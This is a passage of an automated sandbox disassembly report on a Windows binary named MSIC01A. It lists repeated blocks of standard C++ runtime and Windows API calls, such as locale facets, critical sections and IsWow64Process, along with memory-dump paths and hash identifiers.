                                                                                                                                                                          • Part of subcall function 00F52C4E: EnterCriticalSection.KERNEL32(00F8DD3C,?,?,00F32427,00F8E638,00F76B40), ref: 00F52C58
                                                                                                                                                                          • Part of subcall function 00F52C4E: LeaveCriticalSection.KERNEL32(00F8DD3C,?,?,00F32427,00F8E638,00F76B40), ref: 00F52C8B
                                                                                                                                                                          • Part of subcall function 00F52C4E: RtlWakeAllConditionVariable.NTDLL ref: 00F52D02
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CriticalSection$EnterLeave$AddressConditionCurrentExceptionFreeHandleLocalModuleProcProcessRaiseVariableWake
                                                                                                                                                                        • String ID: IsWow64Process$kernel32
                                                                                                                                                                        • API String ID: 1333104975-3789238822
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Mpunct$GetvalsH_prolog3
                                                                                                                                                                        • String ID: $+xv
                                                                                                                                                                        • API String ID: 2204710431-1686923651
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetCurrentProcess.KERNEL32(72A902E8,72A902E8,?,?,00000000,00F74981,000000FF), ref: 00F362EB
                                                                                                                                                                          • Part of subcall function 00F52C98: EnterCriticalSection.KERNEL32(00F8DD3C,?,?,?,00F323B6,00F8E638,72A902E8,?,?,00F73D6D,000000FF), ref: 00F52CA3
                                                                                                                                                                          • Part of subcall function 00F52C98: LeaveCriticalSection.KERNEL32(00F8DD3C,?,?,?,00F323B6,00F8E638,72A902E8,?,?,00F73D6D,000000FF), ref: 00F52CE0
                                                                                                                                                                        • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 00F362B0
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00F362B7
                                                                                                                                                                          • Part of subcall function 00F52C4E: EnterCriticalSection.KERNEL32(00F8DD3C,?,?,00F32427,00F8E638,00F76B40), ref: 00F52C58
                                                                                                                                                                          • Part of subcall function 00F52C4E: LeaveCriticalSection.KERNEL32(00F8DD3C,?,?,00F32427,00F8E638,00F76B40), ref: 00F52C8B
                                                                                                                                                                          • Part of subcall function 00F52C4E: RtlWakeAllConditionVariable.NTDLL ref: 00F52D02
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CriticalSection$EnterLeave$AddressConditionCurrentHandleModuleProcProcessVariableWake
                                                                                                                                                                        • String ID: IsWow64Process$kernel32
                                                                                                                                                                        • API String ID: 2056477612-3789238822
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,00F56AA3,?,?,00F8DDCC,00000000,?,00F56BCE,00000004,InitializeCriticalSectionEx,00F797E8,InitializeCriticalSectionEx,00000000), ref: 00F56A72
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeLibrary
                                                                                                                                                                        • String ID: api-ms-
                                                                                                                                                                        • API String ID: 3664257935-2084034818
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,72A902E8,?,?,00000000,00F76A6C,000000FF,?,00F62DC1,?,?,00F62D95,?), ref: 00F62E23
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00F62E35
                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00000000,00F76A6C,000000FF,?,00F62DC1,?,?,00F62D95,?), ref: 00F62E57
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                        • API String ID: 4061214504-1276376045
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 00F66E40
                                                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 00F66F01
                                                                                                                                                                        • __freea.LIBCMT ref: 00F66F68
                                                                                                                                                                          • Part of subcall function 00F65BDC: HeapAlloc.KERNEL32(00000000,00000000,00F63841,?,00F6543A,?,00000000,?,00F56CE7,00000000,00F63841,00000000,?,?,?,00F6363B), ref: 00F65C0E
                                                                                                                                                                        • __freea.LIBCMT ref: 00F66F7D
                                                                                                                                                                        • __freea.LIBCMT ref: 00F66F8D
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1096550386-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F3B8DD
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F3B900
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F3B928
                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00F3B98D
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F3B9B7
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 459529453-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetLastError.KERNEL32(00000000,?,?,76ED4450,00F35646,?,?,?,?,?), ref: 00F35898
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLast
                                                                                                                                                                        • String ID: Call to ShellExecuteEx() returned:$Last error=$false$true
                                                                                                                                                                        • API String ID: 1452528299-1782174991
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Maklocstr$Maklocchr
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2020259771-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00F3D883
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F3D88D
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                        • numpunct.LIBCPMT ref: 00F3D8C7
                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00F3D8DE
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F3D8FE
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registernumpunct
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 743221004-0
                                                                                                                                                                        • Opcode ID: dccd47c2c63d05e4372774c8000d2e186f6a27ec63241096fc0d7e9754282f9b
                                                                                                                                                                        • Instruction ID: 9ffb3cb021d0df5b9ccf580af35667caed58ab6dcf9af08df59a121a9dea94c7
                                                                                                                                                                        • Opcode Fuzzy Hash: dccd47c2c63d05e4372774c8000d2e186f6a27ec63241096fc0d7e9754282f9b
                                                                                                                                                                        • Instruction Fuzzy Hash: DE11CE35D0061ADFCB09FB64AC416BE7B60AF84730F240459F911AB2D1CF78AE05AB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00F42301
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F4230B
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                        • codecvt.LIBCPMT ref: 00F42345
                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00F4235C
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F4237C
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 712880209-0
                                                                                                                                                                        • Opcode ID: a27a86e3a5144d13edc9973fa1a62885075704da6d2b1f8ad42b43c3f96a4bb3
                                                                                                                                                                        • Instruction ID: 62cd35d2af9d8fcc505e281b31c14597def64ee5e1ec76cc257d88074e9e2c9d
                                                                                                                                                                        • Opcode Fuzzy Hash: a27a86e3a5144d13edc9973fa1a62885075704da6d2b1f8ad42b43c3f96a4bb3
                                                                                                                                                                        • Instruction Fuzzy Hash: 4901C031900619DBCB05EB64DC41ABEBBB0AF80720F250519F914AB3D2DF7C9E05AB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00F42396
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F423A0
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                        • codecvt.LIBCPMT ref: 00F423DA
                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00F423F1
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F42411
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 712880209-0
                                                                                                                                                                        • Opcode ID: 60399aa4ede025215fd9d03295115a201834976d42152d336d78de5ffbb85f50
                                                                                                                                                                        • Instruction ID: 57ce6552136268a3d491f827611622f7b8a2138c9748beaac85eba20b44209cf
                                                                                                                                                                        • Opcode Fuzzy Hash: 60399aa4ede025215fd9d03295115a201834976d42152d336d78de5ffbb85f50
                                                                                                                                                                        • Instruction Fuzzy Hash: BF01C031900219DBCB05EB649C416BE7BB1BF80720F240419F9106B2D2CFBC9E05EB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00F424C0
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F424CA
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                        • collate.LIBCPMT ref: 00F42504
                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00F4251B
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F4253B
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1007100420-0
                                                                                                                                                                        • Opcode ID: 59f2c9dce089709517fc5843e30aa9d91e972ee1d4fa9bce7ee4db396fd29099
                                                                                                                                                                        • Instruction ID: a7b81481d332c681f47a52e0567b898596eb4934324653fbd4de54ca63b071c0
                                                                                                                                                                        • Opcode Fuzzy Hash: 59f2c9dce089709517fc5843e30aa9d91e972ee1d4fa9bce7ee4db396fd29099
                                                                                                                                                                        • Instruction Fuzzy Hash: C701D231900619DBCB05EB64DC456BE7B60AF84730F250419F910AB3D2CF789E05BB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00F4242B
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F42435
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                        • collate.LIBCPMT ref: 00F4246F
                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00F42486
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F424A6
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1007100420-0
                                                                                                                                                                        • Opcode ID: 59a340c1da3e8d3556afecc62b59908d5e09e0577dbbb01d7274f29a6ee3b561
                                                                                                                                                                        • Instruction ID: 7132f5c97c606bb244e5e9858aa27dfb9e73738f185fedd0a99bb2c089e9414c
                                                                                                                                                                        • Opcode Fuzzy Hash: 59a340c1da3e8d3556afecc62b59908d5e09e0577dbbb01d7274f29a6ee3b561
                                                                                                                                                                        • Instruction Fuzzy Hash: 13018031900619DBCB05EB64DC416BEBF61AF84730F250419F9146B3D2DF789E05EB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00F425EA
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F425F4
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                        • messages.LIBCPMT ref: 00F4262E
                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00F42645
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F42665
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2750803064-0
                                                                                                                                                                        • Opcode ID: 0d46b8e6adfc85ad8c1c42537ab3cef6fa2d66a1782dbfe158294973c67aefba
                                                                                                                                                                        • Instruction ID: be96df7534fdcd8a7e0bfb0caf2f093d962d7e09ce5b93f291acaed534f545ee
                                                                                                                                                                        • Opcode Fuzzy Hash: 0d46b8e6adfc85ad8c1c42537ab3cef6fa2d66a1782dbfe158294973c67aefba
                                                                                                                                                                        • Instruction Fuzzy Hash: D701CC31900219DBCB05FB649C51ABE7BA0BF80760F254419F910AB3D2CF789E01EB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00F42555
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F4255F
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                        • ctype.LIBCPMT ref: 00F42599
                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00F425B0
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F425D0
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registerctype
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 83828444-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00F3D6C4
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F3D6CE
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
